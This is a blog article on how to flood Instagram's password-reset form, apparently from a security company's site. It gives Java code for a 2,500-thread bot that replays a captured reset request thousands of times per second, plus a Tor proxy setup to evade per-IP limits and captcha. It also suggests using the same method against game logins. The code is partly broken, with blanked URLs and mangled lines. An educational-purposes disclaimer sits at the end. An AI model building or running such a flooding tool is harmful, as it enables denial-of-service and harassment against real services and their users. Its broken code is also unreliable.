Join the Webinar | Strong Protection Against Cyber Threats

Instagram Password Reset Attack and Bot Making

“Instagram hacking!”. Everyone who hears this phrase usually thinks of “How to hack an account?” or “How to view a locked profile without being followed?” Questions like come up. Since this is an issue especially for Instagram employees, it becomes difficult to be successful in such hacking events. But the hack that we will describe in this article is a little different from the others.

We will try to convey the subject to you based on an event that happened in the past days. While examining the account of a friend whose Instagram profile was hacked recently, a point came to our attention: When the accounts are hacked, the first thing to do is to go to the "forgot password" section. In this section, whether you have a personal account or not, the information required for login such as Instagram user name, e-mail, phone number can be entered and Instagram can send a password reset message.

Afterwards, during the work on the account, a password renewal request was sent for the hacked account. It has been concluded that the person who made the hacking process connected his own phone number to the account he took over. This result showed that the password reset request was sent to the phone of the hacker. At the same time, based on this result, sending the password reset request to the hacker's phone 1000 times per second could be a solution to the problem. The following steps; It is the creation of a bot that generates http packets and sends multithreads, and when the password renewal request is made, the same packet is produced and sent via the bot. The study, summarized so far, shows the “lack of captcha protection of the password renewal section” due to Instagram's failure to take into account that this type of spam attack can be made. The last written bot has been tested and run successfully. We will share the details of the study in the continuation of the article.

Stage 1: Capturing Packages

In the first stage of the study, when the password is renewed for the account on Instagram, the original package sent from the computer must be found. There are many programs that can be used for this. However, many of these programs can cause complexity in this process. Leaving all this behind, we recommend using a simple web browser plug-in, HTTP-Repeater.

Download link:

After the add-on is downloaded and installed, it should be run by clicking the add-on icon on the browser. Since the target site is Instagram, packages related to Instagram should be filtered in order to avoid confusion. For this, in the Tab opened by the plugin filter section should be used.

After filtering, you are ready to send a password renewal request to Instagram. Instagram's password renewal section is opened from the browser and an account username is written and the button is pressed. Going back to the Plugin's Tab POST A package thrown by the method must be searched for.

After the search, the password renewal package and all relevant details are listed. The next step is to create a bot that ensures that the same package is constantly produced and sent.

Stage 2: Creating the Package Generator Bot

In the second stage of the study, a bot will be created that can produce exactly the same package obtained as a result of filtering ("email_or_username=" in the package is different for each user. There will be a variable after the "=" sign). “Java” was used in this study. The bot to be created needs to send these packets in a multithreaded way. This makes the attack more effective. In addition, "Java" language is more advantageous than other languages that can be preferred in multithreading.

The first stage in the code part that will create the bot multithread to do class the preparation of the structure.

public static class InstagramResetThread extends Thread {

private String user;

private long delay;


public InstagramResetThread(String user, long delay) throws Exception {

this.user = user;

this.delay = delay;




public void run() {





url = url new URL(“”);

URLConnection con = url.openConnection();

HttpURLConnection http = (HttpURLConnection)con;



map arguments = new HashMap<>();

arguments.put(“email_or_username”, user);

arguments.put(“recaptcha_challenge_field”, “”);

StringJoiner sj = new StringJoiner(“&”);

for(Map.Entry entry : arguments.entrySet())

sj.add(URLEncoder.encode(entry.getKey(), “UTF-8”) + “="

+ URLEncoder.encode(entry.getValue(), “UTF-8”));

byte[] out = sj.toString().getBytes(StandardCharsets.UTF_8);

int length = out.length;


http.setRequestProperty(“Content-Type”, “application/x-www-form-urlencoded; charset=UTF-8”);

http.setRequestProperty(“X-Requested-With”, “XMLHttpRequest”);

http.setRequestProperty(“X-CSRFToken”, “pOVGNGyRjyQIuWpxlmAoRJeVMePXOXbO”);

http.setRequestProperty(“X-IG-App-ID”, “936619743392459”);

http.setRequestProperty(“Origin”, “”);

http.setRequestProperty(“X-Instagram-AJAX”, “550ed74fd7c9”);



try(OutputStream os = http.getOutputStream()) {


}catch (Exception e) {e.printStackTrace();}



} catch (Exception e) {e.printStackTrace();}


try{Thread.sleep(delay);}catch(Exception e2){e2.printStackTrace();}





}//end of InstagramReset thread

The Headers used and the data to be POSTed are the same as those obtained as a result of filtering with the “HTTP-Repeater” plugin (User-Agent specifies your browser. For this reason, you do not need to set this part in the coding, since the values will constantly change when the site is opened with different browsers).

Class After the structure is created, class' of thread It is necessary to write a loop that will be used as

String user = “instagram”;

int threads = 2500;

int delay = 500;


try {


for (int i = 0; i < threads; i++) {

InstagramResetThread thread = new InstagramResetThread(user, delay);




} catch (Exception e1) {e1.printStackTrace();}

When the written code block is run in the main function, 2500 pieces of the first Thread Class written will be created and each will send requests in the interval of 500 milliseconds (5000 times per second in total). As a result, Instagram will be able to send a password reset request for the account.

Bonus: Tor Integration

Having captcha or ddos protection on some target sites may limit such password renewal requests per IP. In such cases, Tor must be used to circumvent the limitation. Each time the limit is exceeded, another exit node must be passed. Thus, since the IP will always look different, this obstacle is overcome and a password reset request is sent as many times as desired. This section will explain how to add this feature to the program.

System.setProperty(“http.proxySet”, “true”);

System.setProperty(“http.proxyHost”, “”);


System.setProperty(“https.proxySet”, “true”);

System.setProperty(“https.proxyHost”, “”);


System.setProperty(“socksProxyHost”, “”);

System.setProperty(“socksProxyPort”, “9150”);

The Java software connections used in the main function are directed by Tor to the block created at the top. However, before the program is run, Tor Browser Bundle or AdvOR programs must be run and Tor connection must be waited for.

Download links:

NOTE: You can control the setup of the Tor connection with a code block that will be added to the generated Java software.

//IP check

JPanel TorGui = new JPanel();

TorGui.setLayout(new GridLayout(1,1));

JEditorPane website = new JEditorPane(“”);

//JEditorPane website = new JEditorPane(“”);






TorGui.add(new JScrollPane(website));



//tor check

JPanel TorGui2 = new JPanel();

TorGui2.setLayout(new GridLayout(1,1));

JEditorPane website2 = new JEditorPane(“”);






TorGui2.add(new JScrollPane(website2));



JTabbedPane tabs = new JTabbedPane();

tabs.add(“”, TorGui2);

tabs.add(“”, TorGui);


JFrame torbrowser = new JFrame(“Internal Tor Browser”);

torbrowser.setLayout(new GridLayout(1,1));

torbrowser.setSize(640, 480);




This block creates a simple 2 Tab borwser window shown in the images below and allows the Tor connection to be seen.

What kind of a way does Instagram follow in this regard?

All these processes reveal the need to learn the Bug Bouny policy of the relevant places. When Instagram's policy is examined (the rules may be the same for companies like Facebook), almost nothing is covered or ignored, except for hackers trying to take over a user's account.

In What Other Situations Can This Attack Be Used?

your attack, multithreaded Considering that it is an HTTP form filling process, the target must have an IP block system made for DDos to prevent this situation (Attack seems to be the same DDos attack in network traffic and if the target site is weak in terms of security, DDos effect can be created. This is a spam attack though. It can also be considered as a DDos attack on a form.). a simple captcha protection can save this situation. captchaIt draws attention to the importance of

In addition, the attack can be tried on an online game with a client program that works with the Login system instead of a Web Site. The point to be noted in this section is; client If the program encrypts the packets before sending them to the server, the attack will be difficult. There will also be a need for a more comprehensive traffic controller without browser plug-ins.


Everything described in the article is purely for educational purposes. You must not engage in illegal activities against the accounts. We are not responsible for the problems encountered.


Categories uncategorized